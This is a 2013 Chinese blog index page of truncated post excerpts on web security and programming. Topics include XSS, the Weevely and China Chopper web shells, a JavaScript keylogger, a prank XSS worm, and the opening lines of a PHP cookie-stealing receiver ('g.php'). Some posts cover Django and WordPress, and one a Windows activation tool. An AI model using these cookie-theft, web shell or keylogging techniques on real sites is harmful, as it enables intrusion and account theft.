admin 12年前 (2013-06-18) 2112浏览 1评论

漏洞作者： 心伤的瘦子 提交时间： 2012-12-13 14:18 公开时间： 2013-01-27 14:19 漏洞类型： xss跨站脚本攻击 1. XSS的存在，一定是伴随着输入，与输出2个概念的。 2. 要想过滤掉XSS，你可以在输入层面过...

admin 12年前 (2013-06-18) 2812浏览 0评论

一、wordpress内嵌文件插件Google-Doc-Embedder 今天为了找一个可以在博客内内嵌ppt或者pdf文件的方法，知道了Google Doc Embedder插件了。插件地址：http://wordpress.org/plugins...

admin 12年前 (2013-06-15) 1471浏览 0评论

感谢Aulddays的投递 Google Reader 将在 7月1日关闭。虽然谷歌官方提供了Take out用于导出用户数据，但导出的范围仅限订阅列表、关注列表、加星或分享过的条目之类，而阅读过的大部分内容则很难找回来了。GReader Archi...

admin 12年前 (2013-06-15) 2726浏览 0评论

本人有个很不好的习惯，就是在浏览器中打开很多的页面。有时关闭电脑时仍有很多页面没有处理完，所以希望下次打开firefox时能够显示没有处理完的页面而不是firefox的主页。所以设置过程如下，很简单滴： 点“工具”（tools)，然后点最下面的“选项...

admin 12年前 (2013-06-15) 1968浏览 0评论

一、”window.location.href”、”location.href”两个是一样的，代表当前窗口的url，因此在xss代码获取location.href的值就可以获取当前窗口的url值。当然如...

admin 12年前 (2013-06-15) 1556浏览 1评论

XMLHttpRequest 是 AJAX 的基础。 XMLHttpRequest 对象 所有现代浏览器均支持 XMLHttpRequest 对象（IE5 和 IE6 使用 ActiveXObject）。 XMLHttpRequest 用于在后...

admin 12年前 (2013-06-14) 1504浏览 0评论

https://github.com/epinna/Weevely Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential...

admin 12年前 (2013-06-14) 3542浏览 1评论

本帖最后由 haxsscker 于 2013-5-31 12:06 编辑 ########################################## #  Title: 当XSS遇到后台限制登录或者HTTPONLY时，还能做什么？ #  ...

admin 12年前 (2013-06-13) 1830浏览 0评论

小编：欢迎更多民间原创安全产品投递到「Freebuf黑客与极客」，Freebuf也乐意为各位开发者发布和推广，让更多人看到你们的灵感和创造力，体现产品价值。 天蝎座web安全渗透测试工具集V5 发布 插件更新功能，后面的功能大家只要更新插件即可 运行...

admin 12年前 (2013-06-13) 3960浏览 2评论

这种方法是非常公开的，但很多人仍然不知道它。 cookie时，从目标不能重复使用，您可以使用此方法。 你需要一台主机上传： g.php <?php $Keylog = $_GET["c"]; $reffer = $_SERVER['HTTP...

admin 12年前 (2013-06-13) 1581浏览 0评论

www.2cto.com：这是only_guest在红黑联盟现场培训的时候讲的稿子，分享出来 1,分析目标网站内容及功能 (1)  首先确定网站采用何种语言编写.或者是否有混用的情况.此处可以通过查看网站源文件,观察网站链接,捕获提交请求等方式获取....

admin 12年前 (2013-06-13) 1446浏览 0评论

主要分四个部分 第一部分：浏览器的按键事件 第二部分：兼容浏览器 第三部分：代码实现和优化 第四部分：总结 第一部分：浏览器的按键事件 用 js实现键盘记录，要关注浏览器的三种按键事件类型，即keydown，keypress和keyup，它们分别对应...

admin 12年前 (2013-06-13) 2385浏览 0评论

降权Apache codesky.net 已更新今天 今天师兄让我搭建服务器，用到wamp和python程序的搭建，现将搭建过程与遇到的问题记录如下： 基本过程： 一、安装Python和扩展程序。执行文件直接执行即可，非执行文件通过python...

admin 12年前 (2013-06-13) 1885浏览 0评论

渗透测试必备-Firefox全套渗透装 作者：admin 发表于：2012-10-19 　 点击：3,090 工欲善必先利其器，firefox一直是各位渗透师必备的利器，小编这里推荐34款firefox渗透测试辅助插件，其中包含渗透测试、信息收集、代...

admin 12年前 (2013-06-13) 4035浏览 3评论

linux下运行中国菜刀 作者：honker90   发布：2013-05-27 16:51   分类：个人关注   被撸：711次   抢沙发 评语：这个方法……真的好蛋疼 本来一直在等官方放出来linux版的，结果官网都已经关了o(╯□╰)o 秉...

admin 12年前 (2013-06-13) 1609浏览 0评论

简评: 需要的时候可以查阅下，不过最好在虚拟机中使用。 http://pan.baidu.com/share/link?shareid=438511&uk=3995529665 已经下载下来了，保存地址一会整理后再确定。 最新： 里转过来的...

admin 12年前 (2013-06-13) 1507浏览 0评论

一个无聊程序猿，发现百度一个bug，用js（javascript）写了一个简单的程序，用XSS注入到web里，打开帖子，只要你喜欢的贴吧等级大于3，会转发他那个帖子，没有病毒，不会影响个人电脑，也不会盗号，只是一个恶作剧而已 帖子点了后会在其他的贴...

admin 12年前 (2013-06-12) 1405浏览 0评论

win7系统因为界面美观，操作方便所以深受很多用户的喜欢，但是win7系统的激活时需要付费的，今天就和大家介绍一款比较便捷的激活工具用法，希望对大家有帮助。 工具/原料 win7激活工具，附件在参考资料的网盘地址里。 ...

admin 12年前 (2013-06-12) 2144浏览 0评论

具体内容查看《Django使用request和response对象（1）》，本文只是更形象化的展现相关知识，知识没有上一篇文章广泛。   一、关于request、response 这两个是好哥们，总是形影不离。它们可以用如下图表示： 二...

admin 12年前 (2013-06-12) 1898浏览 0评论

当 请求一张页面时，Django把请求的metadata数据包装成一个HttpRequest对象，然后Django加载合适的view方法,把这个 HttpRequest 对象作为第一个参数传给view方法。任何view方法都应该返回一个HttpR...